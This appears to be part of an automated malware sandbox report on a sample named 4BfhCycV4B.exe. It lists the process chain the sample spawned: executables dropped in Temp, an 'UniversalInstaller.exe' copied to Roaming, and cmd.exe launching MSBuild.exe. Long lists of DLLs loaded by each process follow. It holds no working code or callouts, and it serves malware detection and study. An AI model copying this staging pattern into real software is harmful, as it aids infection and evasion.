                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe "C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe"
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.0.exe "C:\Users\user\AppData\Local\Temp\u3z0.0.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.1.exe "C:\Users\user\AppData\Local\Temp\u3z0.1.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: msvcr100.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: msvcr100.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: mozglue.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: msvcp140.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: vcruntime140.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wsock32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: security.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: olepro32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: schedcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: msxml6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: idndl.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: dwmapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: sppc.dllJump to behavior
